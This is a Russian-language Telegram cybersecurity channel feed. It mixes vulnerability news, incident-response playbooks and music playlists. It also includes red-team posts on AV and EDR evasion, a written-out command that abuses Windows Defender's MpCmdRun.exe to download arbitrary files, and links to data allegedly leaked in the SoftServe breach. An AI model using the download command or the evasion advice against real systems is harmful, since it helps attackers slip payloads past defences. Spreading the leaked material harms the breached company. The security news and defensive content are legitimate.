🇺🇦x_Notes🇺🇦 🔜 – Telegram
🇺🇦x_Notes🇺🇦 🔜
1.79K subscribers
426 photos
41 videos
14 files
373 links
Cybersecurity Notes
Download Telegram
👋 Доброе субботнее утро.
🦁 Если среди вас есть пользователи сервиса #LinguaLeo то у меня для вас неприятные новости, сервис крайне дыряв по причине того что парни решили построить #API на хранимых процедурах в #БД, и не очень заморачивались над безопасностью. В итоге там огромная дыра в безопасности, больше подробностей по ссылке, там целый тред о всех прелестях этого архитектурного решения.

#PostgreSQL #db

https://twitter.com/sansys/status/1299657208934916097
😈 Афигенный репорт с #HackerOne об #RCE уязвимости в популярном мессенджере #Slack
👨‍💻 Классный пример того как даже в столь продвинутом и современном софте допускаются серьезные ошибки

#h1 #report #js #javanoscript

https://news.1rj.ru/str/DC8044_Info/766
😐 Понедельник, тяжелый день. Тем не менее у меня для вас есть интересный материал.
🤠 Статья о том как обойти детект антивирусами полезной нагрузки сгенерированной при помощи #metasploit #framework
🙆‍♂️ Как всегда убер вооруженные #антивирусы перестают детектить малварь при смене парочки байтов. Как говорится: “шаг влево, шаг вправо, #FUD

#av #bypass #payload

https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
👽 Если вы ни смотря на все отговорки друзей, родственников и знакомых все же хотите врываться в программирование на ассемблере, реверс-инжиниринг и понимание внутренностный операционных систем, поздравляю - вы упороты.
🧠 Но так как я тут делюсь полезной информацией, то специально для вас у меня ссылка с подборкой на различные обучающие материалы по теме языка #ассемблер. Изучайте, познавайте мир, и возможно когда-то вы наресерчите дыру в #iOS и продадите ее за два миллиона долларов и уедете жить на острова, но это не точно!

#assembly #reverse #reverseengineering #exploit

https://gist.github.com/navneetmuffin/ff678b1fda17e6188aa0462a99626121
👾 Совсем забыл поделится тем что со второго по пятое сентября будет проходить #r2con конференция посвящённая #opensource дизассемблеру #radare2
🤖 Данный проект живет благодаря своему комьюнити, которое не смотря на все шутки и подколы(в том числе и от меня), делает классное дело. Особенно круто то что наше комьюнити #r0crew активно участвует в жизни проекта.
❗️Больше информации по ссылке

#conference

https://rada.re/con/2020/
📚 Тут подъехал набор плейбуков для различных инцидентов, каждый #playbook есть как в виде pdf так и visio файла. Естественно каждый плэйбук построен на семи шагах описаных в #NIST
▪️ Prepare
▪️ Detect
▪️Analyze
▪️Contain
▪️Eradicate
▪️Recover
▪️Post-Incident Handling
Я прошелся по нескольким, и мне как человеку который любит структурированость прямо очень понравилось. Думаю очень зайдет организациям у которых нет вообще ничего, и они не понимают от чего отталкиваться, или специалистам которые хотят попасть на сторону Blue Team и не понимают что там вообще происходит. В общем годнота.
🧃Как по мне прекрасный контент для #SOC related читателей канала 🤜🤛

#incidentresponse #IR #bestpractice #blueteam

https://www.incidentresponse.com/playbooks/
🤯 По дружески каналам долетела информация о том что компания #SoftServe подверглась атаке вируса шифровальщика. Новая жертва хакерских группировок готовящихся провести холодную зиму на тропических, жарких островах. В тоже время как инженеры компании будут встречать Новый год в заснеженных коробках из под холодильников.

#breakingnews #ransomware

https://news.1rj.ru/str/DC8044_Info/773
🇺🇦x_Notes🇺🇦 🔜 pinned «🤯 По дружески каналам долетела информация о том что компания #SoftServe подверглась атаке вируса шифровальщика. Новая жертва хакерских группировок готовящихся провести холодную зиму на тропических, жарких островах. В тоже время как инженеры компании будут…»
🍎 Алярм, алярм, волк унес зайчат. Разработчики малвари #Shlayer успешно обошли автоматические проверки в #AppStore для #macOS и сумели залить малварь. Ждем реакцию со стороны #Apple.

#malware

https://objective-see.com/blog/blog_0x4E.html
​​🎧 Работая в офисе типа #openspace бывает сложно сфокусироваться, поэтому я слушаю музыку. С момента выхода #Spotify на Украинский рынок полностью мигрировал на данный музыкальный сервис.
🎸 Ниже подборка плейлистов которые я слушаю на работе, гуляя, и иногда даже читая.

#music #playlists #chill

💻 Hacker’s Coffee - типа хэккэрский плейлист, хорошо подходит для динамической работы, держит в тонусе.
https://spoti.fi/2EYSkMw

✈️ Go Pro Travel Video Background Music - прикольный плейлист с популярными треками, хорошо заходит при путешествиях на машине, и по утрам для позитивного настроения на день.
https://spoti.fi/2QOBBOG

🧘‍♂️ Deep Focus - отличный фоновый #ambient, позволяет расслабится и сконцентрироваться на задаче.
https://spoti.fi/2ERZZwD

📖 Reading Soundtrack - мой топ при чтении книг, отличный фон для того чтобы не мешали внешние звуки так как я люблю читать в метро или общественном транспорте. В тоже время плейлист позволяет расслабится и не обращать внимание на то что вообще играет музыка.
https://spoti.fi/3hTIASp

🤘44WAVE - это уже не Spotify, а проект DefCon Kyiv. Но музыка тоже годная, и музыкальная редакция всегда отбирает только лучшие треки для слушателей.
https://bit.ly/31NrsIv
🤠 Лучший мем про ИБ и 3е сентября, от друзей из DC8800! 😭

#mem #3rdseptember

https://news.1rj.ru/str/DC8800/124
​​🔵🔵
🙂 Доброе утро. Пост для команды защищающих, но как всегда атакующие могут использовать информацию для обхода защиты. В этот раз набор плэйбуков для #threathunting. Проект #opensource и наполняется силами комьюнити. На данный момент представлены плэйбуки только для #Windows но есть заглушки для #Linux и #macOS соответственно можно расчитывать что и под эти платформы будут #playbook
P.S. Посты для #blueteam я буду отмечать двумя синими точками, для #redteam двумя красными, а для обоих команд соответственно синей и красной.

https://threathunterplaybook.com/introduction.html
🔴🔴
🐦 Исследователь опубликовал в Твитере новый трюк как обойти защиту #windows при скачивании файлов.
🤔 Метод заключается в том чтобы скачать файл при помощи консольной версии “Microsoft Malware Protection” это успех!
Код позволяющий скачивать файлы: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>

#WindowsDefender #bypass #av #redteam #MalwareProtection

https://twitter.com/mohammadaskar2/status/1301263551638761477
​​😱 #Breakingnews тут на канале @freedomf0x опубликовали пачку файликов которые как утверждается имеют отношение в недавнему взлому компании #SoftServe в архивах содержатся #git репозитории с программным кодом
‼️ Достоверность информации не проверена на данный момент, но может у кого из вас есть время проверить.‼️

https://news.1rj.ru/str/freedomf0x/9467
https://news.1rj.ru/str/freedomf0x/9468
https://news.1rj.ru/str/freedomf0x/9469
https://news.1rj.ru/str/freedomf0x/9470
https://news.1rj.ru/str/freedomf0x/9471
https://news.1rj.ru/str/freedomf0x/9472
https://news.1rj.ru/str/freedomf0x/9473
https://news.1rj.ru/str/freedomf0x/9474
​​❗️UPD: Некоторые конфиг файлы прямо указывают на то что по крайней мере один репозиторий имеет отношение к компании #SoftServe
​​⚙️ Всем привет. С ботом который отвечает за постинг в канал возникли проблемы, поэтому новостей не было, буду наверстывать.
❗️Компания #Cisco выпустила обновления безопасности для своих продуктов, по ссылке информация о закрытых уязвимостях. Обновите свои продукты от этого вендора.

#news #patch #vulnerabilities

https://tools.cisco.com/security/center/publicationListing.x
🔥🔥🔥
Прекрасный материал о том как готовили задания для #CTFZone соревнований. Думаю будет полезным тем кто готовит CTF с упором на практические задания. @Betepo_Ok good job👍

#writeup #architecture #ctf

https://medium.com/@offzone.conf/ctfzone-paper-trust-area-backend-part-33526dff5a9c
👽 Тут на неком уважаемом форуме вышел мануал как собрать себе среду для решения заданий #flareon, это такие соревнования по #reverseengineering
😃 Парни видимо “очень старались” у них не было времени объяснять, поэтому output из google translate решили выдать за мануал
😎 Вторая ссылка ведёт на оригинальный репозиторий, с нормальным мануалом. Пользуйтесь проверенными источниками, и не потребляйте дешевые материалы созданные ради количества.

#lulz #friday #fun

codeby{.}net/threads/flare-vm-nastrojka-rabochego-okruzhenija-dlja-revers-inzhiniringa-i-analiza-vredonosnyx-programm.67909/

https://github.com/fireeye/flare-vm
🔴🔴
🔒 Если #antivirus или #edr не дает вам спокойно жить, и блокирует все ваши активности в рамках #redteam операций, если вы хотите узнать какое решение какие использует методы сбора телеметрии. То держите тулу которая поможет посмотреть какую телеметрию собирает то или инное решение, какие хуки оно устанавливает, в следствии чего вы сможете подготовиться так, чтобы ни один #blueteam не обнаружил ваших шаловливых действий.😉
👨‍✈️ Защищающая сторона, сорян вам это мало поможет.

#bypass #telemetry #hook

https://github.com/jthuraisamy/TelemetrySourcerer